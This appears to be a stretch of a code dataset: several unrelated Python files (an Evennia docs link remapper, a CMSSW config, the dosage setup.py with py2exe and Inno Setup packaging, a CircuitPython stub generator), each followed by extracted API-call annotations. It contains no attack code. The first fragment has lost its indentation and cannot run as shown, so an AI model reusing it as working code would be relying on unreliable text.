fname, *anchor = fname.rsplit("#", 1)
if not _CURRFILE.endswith("toc.md"):
_USED_REFS[fname] = url
if _CURRFILE in docref_map and fname in docref_map[_CURRFILE]:
cfilename = _CURRFILE.rsplit("/", 1)[-1]
urlout = docref_map[_CURRFILE][fname] + ("#" + anchor[0] if anchor else "")
if urlout != url:
print(f" {cfilename}: [{txt}]({url}) -> [{txt}]({urlout})")
else:
urlout = url
return f"[{txt}]({urlout})"
def _sub_doc(match):
# reference links set at the bottom of the page
global _USED_REFS
grpdict = match.groupdict()
txt, url = grpdict["txt"], grpdict["url"]
txt = TXT_REMAPS.get(txt, txt)
url = URL_REMAPS.get(url, url)
if any(url.startswith(noremap) for noremap in _NO_REMAP_STARTSWITH):
return f"[{txt}]: {url}"
if "http" in url and "://" in url:
urlout = url
else:
fname, *part = url.rsplit("/", 1)
fname = part[0] if part else fname
fname = fname.rsplit(".", 1)[0]
fname, *anchor = fname.rsplit("#", 1)
if not _CURRFILE.endswith("toc.md"):
_USED_REFS[fname] = url
if _CURRFILE in docref_map and fname in docref_map[_CURRFILE]:
cfilename = _CURRFILE.rsplit("/", 1)[-1]
urlout = docref_map[_CURRFILE][fname] + ("#" + anchor[0] if anchor else "")
if urlout != url:
print(f" {cfilename}: [{txt}]: {url} -> [{txt}]: {urlout}")
else:
urlout = url
return f"[{txt}]: {urlout}"
# replace / correct links in all files
count = 0
for path in sorted(Path(_SOURCE_DIR).rglob("*.md"), key=lambda p: p.name):
# from pudb import debugger;debugger.Debugger().set_trace()
_CURRFILE = path.as_posix()
with open(path, "r") as fil:
intxt = fil.read()
outtxt = ref_regex.sub(_sub, intxt)
outtxt = ref_doc_regex.sub(_sub_doc, outtxt)
if intxt != outtxt:
with open(path, "w") as fil:
fil.write(outtxt)
count += 1
print(f" -- Auto-relinked links in {path.name}")
if count > 0:
print(f" -- Auto-corrected links in {count} documents.")
for (fname, src_url) in sorted(toc_map.items(), key=lambda tup: tup[0]):
if fname not in _USED_REFS:
print(f" ORPHANED DOC: no refs found to {src_url}.md")
# write tocfile
with open(_TOC_FILE, "w") as fil:
fil.write("# Toc\n")
fil.write("- [API root](api/evennia-api.rst)")
for ref in sorted(toc_map.values()):
if ref == "toc":
continue
if "Part1/" in ref:
continue
if not "/" in ref:
ref = "./" + ref
linkname = ref.replace("-", " ")
fil.write(f"\n- [{linkname}]({ref})")
# we add a self-reference so the toc itself is also a part of a toctree
fil.write("\n\n```toctree::\n :hidden:\n\n toc\n```")
print(" -- Auto-Remapper finished.")
if __name__ == "__main__":
auto_link_remapper()
|
[
"os.path.abspath",
"os.path.dirname",
"sphinx.errors.DocumentError",
"collections.defaultdict",
"pathlib.Path",
"os.path.join",
"re.compile"
] |
[((490, 521), 'os.path.join', 'pathjoin', (['_SOURCE_DIR', '"""toc.md"""'], {}), "(_SOURCE_DIR, 'toc.md')\n", (498, 521), True, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((1503, 1520), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1514, 1520), False, 'from collections import defaultdict\n'), ((2986, 3083), 're.compile', 're.compile', (['"""\\\\[(?P<txt>[\\\\w -\\\\[\\\\]\\\\`]+?)\\\\]\\\\((?P<url>.+?)\\\\)"""', '(re.I + re.S + re.U + re.M)'], {}), "('\\\\[(?P<txt>[\\\\w -\\\\[\\\\]\\\\`]+?)\\\\]\\\\((?P<url>.+?)\\\\)', re.I + re\n .S + re.U + re.M)\n", (2996, 3083), False, 'import re\n'), ((3135, 3234), 're.compile', 're.compile', (['"""\\\\[(?P<txt>[\\\\w -\\\\`]+?)\\\\]:\\\\s+?(?P<url>.+?)(?=$|\\\\n)"""', '(re.I + re.S + re.U + re.M)'], {}), "('\\\\[(?P<txt>[\\\\w -\\\\`]+?)\\\\]:\\\\s+?(?P<url>.+?)(?=$|\\\\n)', re.I +\n re.S + re.U + re.M)\n", (3145, 3234), False, 'import re\n'), ((440, 457), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (447, 457), False, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((1538, 1555), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (1542, 1555), False, 'from pathlib import Path\n'), ((2048, 2276), 'sphinx.errors.DocumentError', 'DocumentError', (['f""" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n Evennia\'s auto-link-corrector does not accept doc-files with the same \n name, even in different folders. Rename one.\n"""'], {}), '(\n f""" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n Evennia\'s auto-link-corrector does not accept doc-files with the same \n name, even in different folders. Rename one.\n"""\n )\n', (2061, 2276), False, 'from sphinx.errors import DocumentError\n'), ((2443, 2460), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (2447, 2460), False, 'from pathlib import Path\n'), ((2621, 2640), 'os.path.dirname', 'dirname', (['sourcepath'], {}), '(sourcepath)\n', (2628, 2640), False, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((5638, 5655), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (5642, 5655), False, 'from pathlib import Path\n')]
|
import FWCore.ParameterSet.Config as cms
l1MetFilterRecoTree = cms.EDAnalyzer("L1MetFilterRecoTreeProducer",
triggerResultsToken = cms.untracked.InputTag("TriggerResults::RECO"),
hbheNoiseFilterResultToken = cms.untracked.InputTag("HBHENoiseFilterResultProducer:HBHENoiseFilterResult")
)
|
[
"FWCore.ParameterSet.Config.untracked.InputTag"
] |
[((149, 195), 'FWCore.ParameterSet.Config.untracked.InputTag', 'cms.untracked.InputTag', (['"""TriggerResults::RECO"""'], {}), "('TriggerResults::RECO')\n", (171, 195), True, 'import FWCore.ParameterSet.Config as cms\n'), ((235, 312), 'FWCore.ParameterSet.Config.untracked.InputTag', 'cms.untracked.InputTag', (['"""HBHENoiseFilterResultProducer:HBHENoiseFilterResult"""'], {}), "('HBHENoiseFilterResultProducer:HBHENoiseFilterResult')\n", (257, 312), True, 'import FWCore.ParameterSet.Config as cms\n')]
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2004-2005 <NAME> and <NAME>
# Copyright (C) 2012-2014 <NAME>
"""
Setup file for the distuils module.
It includes the following features:
- py2exe support (including InnoScript installer generation)
- Microsoft Visual C++ DLL installation for py2exe
- creation and installation of configuration files with installation data
- automatic MANIFEST.in check
"""
from __future__ import print_function
import os
import sys
import codecs
import re
import glob
import shutil
import subprocess
import warnings
try:
# py2exe monkey-patches the distutils.core.Distribution class
# So we need to import it before importing the Distribution class
import py2exe
has_py2exe = True
except ImportError:
# py2exe is not installed
has_py2exe = False
from distutils.core import setup, Distribution
from distutils.command.install_lib import install_lib
from distutils.command.register import register
from distutils import util
from distutils.file_util import write_file
AppVersion = '2.16'
AppName = 'dosage'
py_excludes = ['doctest', 'unittest', 'Tkinter', 'pdb',
'email', 'ftplib', 'pickle',
]
py_includes = ['dosagelib.plugins.*']
# py2exe options for Windows packaging
py2exe_options = dict(
packages=["encodings"],
excludes=py_excludes,
includes=py_includes,
# silence py2exe error about not finding msvcp90.dll
dll_excludes=['MSVCP90.dll'],
compressed=1,
optimize=2,
)
warnings.filterwarnings("ignore", r"Unknown distribution option")
def normpath (path):
"""Norm a path name to platform specific notation."""
return os.path.normpath(path)
def cnormpath (path):
"""Norm a path name to platform specific notation and make it absolute."""
path = normpath(path)
if os.name == 'nt':
# replace slashes with backslashes
path = path.replace("/", "\\")
if not os.path.isabs(path):
path = normpath(os.path.join(sys.prefix, path))
return path
release_ro = re.compile(r"\(released (.+)\)")
def get_release_date ():
"""Parse and return relase date as string from doc/changelog.txt."""
fname = os.path.join("doc", "changelog.txt")
release_date = "unknown"
with open(fname) as fd:
# the release date is on the first line
line = fd.readline()
mo = release_ro.search(line)
if mo:
release_date = mo.groups(1)
return release_date
# Microsoft Visual C++ runtime version (tested with Python 2.7.2)
MSVCP90Version = '9.0.21022.8'
MSVCP90Token = '<PASSWORD>'
if os.name == 'nt':
data_files = []
else:
data_files = [('share/man/man1', ['doc/dosage.1'])]
def get_nt_platform_vars ():
"""Return program file path and architecture for NT systems."""
platform = util.get_platform()
if platform == "win-amd64":
# the Visual C++ runtime files are installed in the x86 directory
progvar = "%ProgramFiles(x86)%"
architecture = "amd64"
elif platform == "win32":
progvar = "%ProgramFiles%"
architecture = "x86"
else:
raise ValueError("Unsupported platform %r" % platform)
return os.path.expandvars(progvar), architecture
def add_msvc_files (files):
"""Add needed MSVC++ runtime files. Only Version 9.0.21022.8 is tested
and can be downloaded here:
http://www.microsoft.com/en-us/download/details.aspx?id=29
"""
prog_dir, architecture = get_nt_platform_vars()
dirname = "Microsoft.VC90.CRT"
version = "%s_%s_x-ww_d08d0375" % (MSVCP90Token, MSVCP90Version)
args = (architecture, dirname, version)
path = r'C:\Windows\WinSxS\%s_%s_%s\*.*' % args
files.append((dirname, glob.glob(path)))
# Copy the manifest file into the build directory and rename it
# because it must have the same name as the directory.
path = r'C:\Windows\WinSxS\Manifests\%s_%s_%s.manifest' % args
target = os.path.join(os.getcwd(), 'build', '%s.manifest' % dirname)
shutil.copy(path, target)
files.append((dirname, [target]))
if 'py2exe' in sys.argv[1:]:
if not has_py2exe:
raise SystemExit("py2exe module could not be imported")
add_msvc_files(data_files)
class MyInstallLib (install_lib, object):
"""Custom library installation."""
def install (self):
"""Install the generated config file."""
outs = super(MyInstallLib, self).install()
infile = self.create_conf_file()
outfile = os.path.join(self.install_dir, os.path.basename(infile))
self.copy_file(infile, outfile)
outs.append(outfile)
return outs
def create_conf_file (self):
"""Create configuration file."""
cmd_obj = self.distribution.get_command_obj("install")
cmd_obj.ensure_finalized()
# we have to write a configuration file because we need the
# <install_data> directory (and other stuff like author, url, ...)
# all paths are made absolute by cnormpath()
data = []
for d in ['purelib', 'platlib', 'lib', 'headers', 'scripts', 'data']:
attr = 'install_%s' % d
if cmd_obj.root:
# cut off root path prefix
cutoff = len(cmd_obj.root)
# don't strip the path separator
if cmd_obj.root.endswith(os.sep):
cutoff -= 1
val = getattr(cmd_obj, attr)[cutoff:]
else:
val = getattr(cmd_obj, attr)
if attr == 'install_data':
cdir = os.path.join(val, "share", "dosage")
data.append('config_dir = %r' % cnormpath(cdir))
elif attr == 'install_lib':
if cmd_obj.root:
_drive, tail = os.path.splitdrive(val)
if tail.startswith(os.sep):
tail = tail[1:]
self.install_lib = os.path.join(cmd_obj.root, tail)
else:
self.install_lib = val
data.append("%s = %r" % (attr, cnormpath(val)))
self.distribution.create_conf_file(data, directory=self.install_lib)
return self.get_conf_output()
def get_conf_output (self):
"""Get filename for distribution configuration file."""
return self.distribution.get_conf_filename(self.install_lib)
def get_outputs (self):
"""Add the generated config file to the list of outputs."""
outs = super(MyInstallLib, self).get_outputs()
conf_output = self.get_conf_output()
outs.append(conf_output)
if self.compile:
outs.extend(self._bytecode_filenames([conf_output]))
return outs
class MyDistribution (Distribution, object):
"""Custom distribution class generating config file."""
def __init__ (self, attrs):
"""Set console and windows scripts."""
super(MyDistribution, self).__init__(attrs)
self.console = ['dosage']
def run_commands (self):
"""Generate config file and run commands."""
cwd = os.getcwd()
data = []
data.append('config_dir = %r' % os.path.join(cwd, "config"))
data.append("install_data = %r" % cwd)
data.append("install_scripts = %r" % cwd)
self.create_conf_file(data)
super(MyDistribution, self).run_commands()
def get_conf_filename (self, directory):
"""Get name for config file."""
return os.path.join(directory, "_%s_configdata.py" % self.get_name())
def create_conf_file (self, data, directory=None):
"""Create local config file from given data (list of lines) in
the directory (or current directory if not given)."""
data.insert(0, "# this file is automatically created by setup.py")
data.insert(0, "# -*- coding: iso-8859-1 -*-")
if directory is None:
directory = os.getcwd()
filename = self.get_conf_filename(directory)
# add metadata
metanames = ("name", "version", "author", "author_email",
"maintainer", "maintainer_email", "url",
"license", "description", "long_description",
"keywords", "platforms", "fullname", "contact",
"contact_email")
for name in metanames:
method = "get_" + name
val = getattr(self.metadata, method)()
data.append("%s = %r" % (name, val))
data.append('release_date = "%s"' % get_release_date())
# write the config file
util.execute(write_file, (filename, data),
"creating %s" % filename, self.verbose >= 1, self.dry_run)
class InnoScript:
"""Class to generate INNO script."""
def __init__(self, lib_dir, dist_dir, windows_exe_files=[],
console_exe_files=[], service_exe_files=[],
comserver_files=[], lib_files=[]):
"""Store INNO script infos."""
self.lib_dir = lib_dir
self.dist_dir = dist_dir
if not self.dist_dir[-1] in "\\/":
self.dist_dir += "\\"
self.name = AppName
self.lname = AppName.lower()
self.version = AppVersion
self.windows_exe_files = [self.chop(p) for p in windows_exe_files]
self.console_exe_files = [self.chop(p) for p in console_exe_files]
self.service_exe_files = [self.chop(p) for p in service_exe_files]
self.comserver_files = [self.chop(p) for p in comserver_files]
self.lib_files = [self.chop(p) for p in lib_files]
self.icon = os.path.abspath(r'doc\icon\favicon.ico')
def chop(self, pathname):
"""Remove distribution directory from path name."""
assert pathname.startswith(self.dist_dir)
return pathname[len(self.dist_dir):]
def create(self, pathname=r"dist\omt.iss"):
"""Create Inno script."""
print("*** creating the inno setup script ***")
self.pathname = pathname
self.distfilebase = "%s-%s" % (self.name, self.version)
self.distfile = self.distfilebase + ".exe"
with open(self.pathname, "w") as fd:
self.write_inno_script(fd)
def write_inno_script (self, fd):
"""Write Inno script contents."""
print("; WARNING: This script has been created by py2exe. Changes to this script", file=fd)
print("; will be overwritten the next time py2exe is run!", file=fd)
print("[Setup]", file=fd)
print("AppName=%s" % self.name, file=fd)
print("AppVerName=%s %s" % (self.name, self.version), file=fd)
print("ChangesEnvironment=true", file=fd)
print(r"DefaultDirName={pf}\%s" % self.name, file=fd)
print("DefaultGroupName=%s" % self.name, file=fd)
print("OutputBaseFilename=%s" % self.distfilebase, file=fd)
print("OutputDir=..", file=fd)
print("SetupIconFile=%s" % self.icon, file=fd)
print(file=fd)
print("[Tasks]", file=fd)
print("Name: modifypath; Description: Add application directory to %PATH%", file=fd)
print(file=fd)
# List of source files
files = self.windows_exe_files + \
self.console_exe_files + \
self.service_exe_files + \
self.comserver_files + \
self.lib_files
print('[Files]', file=fd)
for path in files:
print(r'Source: "%s"; DestDir: "{app}\%s"; Flags: ignoreversion' % (path, os.path.dirname(path)), file=fd)
# Set icon filename
print('[Icons]', file=fd)
for path in self.windows_exe_files:
print(r'Name: "{group}\%s"; Filename: "{app}\%s"' %
(self.name, path), file=fd)
for path in self.console_exe_files:
name = os.path.basename(path).capitalize()
print(r'Name: "{group}\%s help"; Filename: "cmd.exe"; Parameters: "/K %s --help"' % (name, path), file=fd)
print(r'Name: "{group}\Uninstall %s"; Filename: "{uninstallexe}"' % self.name, file=fd)
print(file=fd)
# Uninstall optional log files
print('[UninstallDelete]', file=fd)
for path in (self.console_exe_files + self.windows_exe_files):
exename = os.path.basename(path)
print(r'Type: files; Name: "{pf}\%s\%s.log"' % (self.lname, exename), file=fd)
print(file=fd)
# Add app dir to PATH
print("[Code]", file=fd)
print("""\
const
ModPathName = 'modifypath';
ModPathType = 'user';
function ModPathDir(): TArrayOfString;
begin
setArrayLength(Result, 1)
Result[0] := ExpandConstant('{app}');
end;
#include "modpath.iss"
""", file=fd)
shutil.copy(r"scripts\modpath.iss", "dist")
def compile (self):
"""Compile Inno script with iscc.exe."""
print("*** compiling the inno setup script ***")
progpath = get_nt_platform_vars()[0]
cmd = r'%s\Inno Setup 5\iscc.exe' % progpath
subprocess.check_call([cmd, self.pathname])
def sign (self):
"""Sign InnoSetup installer with local self-signed certificate."""
print("*** signing the inno setup installer ***")
pfxfile = r'scripts\%s.pfx' % self.lname
if os.path.isfile(pfxfile):
path = get_windows_sdk_path()
signtool = os.path.join(path, "bin", "signtool.exe")
if os.path.isfile(signtool):
cmd = [signtool, 'sign', '/f', pfxfile, self.distfile]
subprocess.check_call(cmd)
else:
print("No signed installer: signtool.exe not found.")
else:
print("No signed installer: certificate %s not found." % pfxfile)
def get_windows_sdk_path():
"""Return path of Microsoft Windows SDK installation, or None if
not found."""
try:
import _winreg as winreg
except ImportError:
import winreg
sub_key = r"Software\Microsoft\Microsoft SDKs\Windows"
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key) as key:
name = "CurrentInstallFolder"
return winreg.QueryValueEx(key, name)[0]
return None
try:
from py2exe.build_exe import py2exe as py2exe_build
class MyPy2exe (py2exe_build):
"""First builds the exe file(s), then creates a Windows installer.
Needs InnoSetup to be installed."""
def run (self):
"""Generate py2exe installer."""
# First, let py2exe do it's work.
py2exe_build.run(self)
print("*** preparing the inno setup script ***")
lib_dir = self.lib_dir
dist_dir = self.dist_dir
# create the Installer, using the files py2exe has created.
script = InnoScript(lib_dir, dist_dir, self.windows_exe_files,
self.console_exe_files, self.service_exe_files,
self.comserver_files, self.lib_files)
script.create()
script.compile()
script.sign()
except ImportError:
class MyPy2exe:
"""Dummy py2exe class."""
pass
class MyRegister (register, object):
"""Custom register command."""
def build_post_data(self, action):
"""Force application name to lower case."""
data = super(MyRegister, self).build_post_data(action)
data['name'] = data['name'].lower()
return data
def get_authors():
"""Read list of authors from a text file, filtering comments."""
authors = []
authorfile = os.path.join('doc', 'authors.txt')
with codecs.open(authorfile, 'r', 'utf-8') as f:
for line in f:
line = line.strip()
if line and not line.startswith(u'#'):
authors.append(line)
return u", ".join(authors)
args = dict(
name = AppName,
version = AppVersion,
description = 'a comic strip downloader and archiver',
keywords = 'comic,webcomic,downloader,archiver',
author = get_authors(),
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
license = 'MIT',
url = 'http://wummel.github.io/dosage/',
packages = (
'dosagelib',
'dosagelib.plugins',
),
data_files = data_files,
scripts = (
'dosage',
),
distclass = MyDistribution,
cmdclass = {
'install_lib': MyInstallLib,
'py2exe': MyPy2exe,
'register': MyRegister,
},
options = {
"py2exe": py2exe_options,
},
classifiers = (
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Multimedia :: Graphics',
'Topic :: Internet :: WWW/HTTP',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Operating System :: OS Independent',
),
install_requires = (
'requests',
)
)
if __name__ == '__main__':
setup(**args)
|
[
"os.path.isfile",
"distutils.util.get_platform",
"glob.glob",
"os.path.join",
"subprocess.check_call",
"shutil.copy",
"os.path.abspath",
"os.path.splitdrive",
"codecs.open",
"py2exe.build_exe.py2exe.run",
"os.path.dirname",
"os.path.normpath",
"distutils.core.setup",
"os.path.basename",
"winreg.QueryValueEx",
"os.path.expandvars",
"winreg.OpenKey",
"re.compile",
"os.path.isabs",
"distutils.util.execute",
"warnings.filterwarnings",
"os.getcwd"
] |
[((1480, 1544), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""', '"""Unknown distribution option"""'], {}), "('ignore', 'Unknown distribution option')\n", (1503, 1544), False, 'import warnings\n'), ((2014, 2047), 're.compile', 're.compile', (['"""\\\\(released (.+)\\\\)"""'], {}), "('\\\\(released (.+)\\\\)')\n", (2024, 2047), False, 'import re\n'), ((1637, 1659), 'os.path.normpath', 'os.path.normpath', (['path'], {}), '(path)\n', (1653, 1659), False, 'import os\n'), ((2157, 2193), 'os.path.join', 'os.path.join', (['"""doc"""', '"""changelog.txt"""'], {}), "('doc', 'changelog.txt')\n", (2169, 2193), False, 'import os\n'), ((2788, 2807), 'distutils.util.get_platform', 'util.get_platform', ([], {}), '()\n', (2805, 2807), False, 'from distutils import util\n'), ((3981, 4006), 'shutil.copy', 'shutil.copy', (['path', 'target'], {}), '(path, target)\n', (3992, 4006), False, 'import shutil\n'), ((15440, 15474), 'os.path.join', 'os.path.join', (['"""doc"""', '"""authors.txt"""'], {}), "('doc', 'authors.txt')\n", (15452, 15474), False, 'import os\n'), ((16865, 16878), 'distutils.core.setup', 'setup', ([], {}), '(**args)\n', (16870, 16878), False, 'from distutils.core import setup, Distribution\n'), ((1906, 1925), 'os.path.isabs', 'os.path.isabs', (['path'], {}), '(path)\n', (1919, 1925), False, 'import os\n'), ((3163, 3190), 'os.path.expandvars', 'os.path.expandvars', (['progvar'], {}), '(progvar)\n', (3181, 3190), False, 'import os\n'), ((3930, 3941), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3939, 3941), False, 'import os\n'), ((7043, 7054), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7052, 7054), False, 'import os\n'), ((8523, 8629), 'distutils.util.execute', 'util.execute', (['write_file', '(filename, data)', "('creating %s' % filename)", '(self.verbose >= 1)', 'self.dry_run'], {}), "(write_file, (filename, data), 'creating %s' % filename, self.\n verbose >= 1, self.dry_run)\n", (8535, 8629), False, 'from distutils import util\n'), ((9539, 9580), 'os.path.abspath', 'os.path.abspath', (['"""doc\\\\icon\\\\favicon.ico"""'], {}), "('doc\\\\icon\\\\favicon.ico')\n", (9554, 9580), False, 'import os\n'), ((12646, 12689), 'shutil.copy', 'shutil.copy', (['"""scripts\\\\modpath.iss"""', '"""dist"""'], {}), "('scripts\\\\modpath.iss', 'dist')\n", (12657, 12689), False, 'import shutil\n'), ((12927, 12970), 'subprocess.check_call', 'subprocess.check_call', (['[cmd, self.pathname]'], {}), '([cmd, self.pathname])\n', (12948, 12970), False, 'import subprocess\n'), ((13186, 13209), 'os.path.isfile', 'os.path.isfile', (['pfxfile'], {}), '(pfxfile)\n', (13200, 13209), False, 'import os\n'), ((13925, 13975), 'winreg.OpenKey', 'winreg.OpenKey', (['winreg.HKEY_LOCAL_MACHINE', 'sub_key'], {}), '(winreg.HKEY_LOCAL_MACHINE, sub_key)\n', (13939, 13975), False, 'import winreg\n'), ((15484, 15521), 'codecs.open', 'codecs.open', (['authorfile', '"""r"""', '"""utf-8"""'], {}), "(authorfile, 'r', 'utf-8')\n", (15495, 15521), False, 'import codecs\n'), ((1951, 1981), 'os.path.join', 'os.path.join', (['sys.prefix', 'path'], {}), '(sys.prefix, path)\n', (1963, 1981), False, 'import os\n'), ((3692, 3707), 'glob.glob', 'glob.glob', (['path'], {}), '(path)\n', (3701, 3707), False, 'import glob\n'), ((4492, 4516), 'os.path.basename', 'os.path.basename', (['infile'], {}), '(infile)\n', (4508, 4516), False, 'import os\n'), ((7863, 7874), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7872, 7874), False, 'import os\n'), ((12195, 12217), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (12211, 12217), False, 'import os\n'), ((13276, 13317), 'os.path.join', 'os.path.join', (['path', '"""bin"""', '"""signtool.exe"""'], {}), "(path, 'bin', 'signtool.exe')\n", (13288, 13317), False, 'import os\n'), ((13333, 13357), 'os.path.isfile', 'os.path.isfile', (['signtool'], {}), '(signtool)\n', (13347, 13357), False, 'import os\n'), ((14037, 14067), 'winreg.QueryValueEx', 'winreg.QueryValueEx', (['key', 'name'], {}), '(key, name)\n', (14056, 14067), False, 'import winreg\n'), ((14432, 14454), 'py2exe.build_exe.py2exe.run', 'py2exe_build.run', (['self'], {}), '(self)\n', (14448, 14454), True, 'from py2exe.build_exe import py2exe as py2exe_build\n'), ((5533, 5569), 'os.path.join', 'os.path.join', (['val', '"""share"""', '"""dosage"""'], {}), "(val, 'share', 'dosage')\n", (5545, 5569), False, 'import os\n'), ((7113, 7140), 'os.path.join', 'os.path.join', (['cwd', '"""config"""'], {}), "(cwd, 'config')\n", (7125, 7140), False, 'import os\n'), ((13446, 13472), 'subprocess.check_call', 'subprocess.check_call', (['cmd'], {}), '(cmd)\n', (13467, 13472), False, 'import subprocess\n'), ((11745, 11767), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (11761, 11767), False, 'import os\n'), ((5743, 5766), 'os.path.splitdrive', 'os.path.splitdrive', (['val'], {}), '(val)\n', (5761, 5766), False, 'import os\n'), ((5894, 5926), 'os.path.join', 'os.path.join', (['cmd_obj.root', 'tail'], {}), '(cmd_obj.root, tail)\n', (5906, 5926), False, 'import os\n'), ((11433, 11454), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (11448, 11454), False, 'import os\n')]
|
import appdirs
import subprocess
import os
#import mypy
import pathlib
import re
import glob
import json
# This is a script for using circuitpython's repo to make pyi files for each board type.
# These need to be bundled with the extension, which means that adding new boards is still
# a new release of the extension.
# First thing we want to do is store in memory, the contents of
# ./circuitpython/circuitpython-stubs/board/__init__.py so we can append it to
# every other board.
board_stub = pathlib.Path(os.path.join("./stubs/board", "__init__.pyi"))
# See [Issue #26](https://github.com/joedevivo/vscode-circuitpython/issues/26)
# for more on this.
generic_stubs = {}
with open(board_stub) as stub:
stubs = stub.readlines()
i = 0
f = []
for s in stubs:
if s.startswith('def'):
f.append(i)
i += 1
f.append(i)
x = f.pop(0)
for y in f:
it = ' ' + ''.join(stubs[x:y-1])
r = re.search(r'def ([^\(]*)\(', it)
k = r[1]
generic_stubs[k] = it
x = y
# now, while we build the actual board stubs, replace any line that starts with ` $name:` with value
board_dirs = glob.glob("circuitpython/ports/*/boards/*")
boards = []
for b in board_dirs :
site_path = os.path.split(b)[-1]
config = pathlib.Path(os.path.join(b, "mpconfigboard.mk"))
print(config)
pins = pathlib.Path(os.path.join(b, "pins.c"))
if config.is_file() and pins.is_file():
usb_vid = ""
usb_pid = ""
usb_product = ""
usb_manufacturer = ""
with open(config) as conf:
for line in conf:
if line.startswith("USB_VID"):
usb_vid = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_PID"):
usb_pid = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_PRODUCT"):
usb_product = line.split("=")[1].split("#")[0].strip('" \n')
elif line.startswith("USB_MANUFACTURER"):
usb_manufacturer = line.split("=")[1].split("#")[0].strip('" \n')
if usb_manufacturer == "Nadda-Reel Company LLC":
continue
board = { 'vid': usb_vid, 'pid': usb_pid, 'product': usb_product, 'manufacturer': usb_manufacturer, 'site_path': site_path }
boards.append(board)
print("{0}:{1} {2}, {3}".format(usb_vid, usb_pid, usb_manufacturer, usb_product))
board_pyi_path = pathlib.Path(os.path.join("boards", usb_vid, usb_pid))
board_pyi_path.mkdir(parents=True, exist_ok=True)
board_pyi_file = pathlib.Path(os.path.join(board_pyi_path, "board.pyi"))
# Indent 0 char for the first pin, 2 for the rest
indent = ""
# We're going to put the common stuff from the generic board stub at the
# end of the file, so we'll collect them after the loop
board_stubs = {}
with open(board_pyi_file, 'w') as outfile, open(pins) as p:
outfile.write("from typing import Any\n")
outfile.write('"""\n')
outfile.write('board {0} {1}\n'.format(board['manufacturer'], board['product']))
outfile.write('https://circuitpython.org/boards/{0}\n'.format(board['site_path']))
outfile.write('"""\n')
outfile.write(" board.")
for line in p:
pin = re.search(r'.*_QSTR\(MP_QSTR_([^\)]*)', line)
if pin == None:
continue
pin_name = pin[1]
if pin_name in generic_stubs:
board_stubs[pin_name] = generic_stubs[pin_name]
continue
else:
outfile.write("{0}{1}: Any = ...\n".format(indent, pin_name))
#redefine indent every time
indent = " "
# End for
for p in board_stubs:
outfile.write("{0}\n".format(board_stubs[p]))
json_file = pathlib.Path(os.path.join("boards", "metadata.json"))
with open(json_file, 'w') as metadata:
json.dump(boards, metadata)
|
[
"json.dump",
"re.search",
"glob.glob",
"os.path.split",
"os.path.join"
] |
[((1118, 1161), 'glob.glob', 'glob.glob', (['"""circuitpython/ports/*/boards/*"""'], {}), "('circuitpython/ports/*/boards/*')\n", (1127, 1161), False, 'import glob\n'), ((512, 557), 'os.path.join', 'os.path.join', (['"""./stubs/board"""', '"""__init__.pyi"""'], {}), "('./stubs/board', '__init__.pyi')\n", (524, 557), False, 'import os\n'), ((3663, 3702), 'os.path.join', 'os.path.join', (['"""boards"""', '"""metadata.json"""'], {}), "('boards', 'metadata.json')\n", (3675, 3702), False, 'import os\n'), ((3745, 3772), 'json.dump', 'json.dump', (['boards', 'metadata'], {}), '(boards, metadata)\n', (3754, 3772), False, 'import json\n'), ((919, 952), 're.search', 're.search', (['"""def ([^\\\\(]*)\\\\("""', 'it'], {}), "('def ([^\\\\(]*)\\\\(', it)\n", (928, 952), False, 'import re\n'), ((1210, 1226), 'os.path.split', 'os.path.split', (['b'], {}), '(b)\n', (1223, 1226), False, 'import os\n'), ((1256, 1291), 'os.path.join', 'os.path.join', (['b', '"""mpconfigboard.mk"""'], {}), "(b, 'mpconfigboard.mk')\n", (1268, 1291), False, 'import os\n'), ((1333, 1358), 'os.path.join', 'os.path.join', (['b', '"""pins.c"""'], {}), "(b, 'pins.c')\n", (1345, 1358), False, 'import os\n'), ((2338, 2378), 'os.path.join', 'os.path.join', (['"""boards"""', 'usb_vid', 'usb_pid'], {}), "('boards', usb_vid, usb_pid)\n", (2350, 2378), False, 'import os\n'), ((2468, 2509), 'os.path.join', 'os.path.join', (['board_pyi_path', '"""board.pyi"""'], {}), "(board_pyi_path, 'board.pyi')\n", (2480, 2509), False, 'import os\n'), ((3156, 3202), 're.search', 're.search', (['""".*_QSTR\\\\(MP_QSTR_([^\\\\)]*)"""', 'line'], {}), "('.*_QSTR\\\\(MP_QSTR_([^\\\\)]*)', line)\n", (3165, 3202), False, 'import re\n')]
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import semantic_version
LATEST_FORMAT_VERSION = '2.4'
def check_version(version):
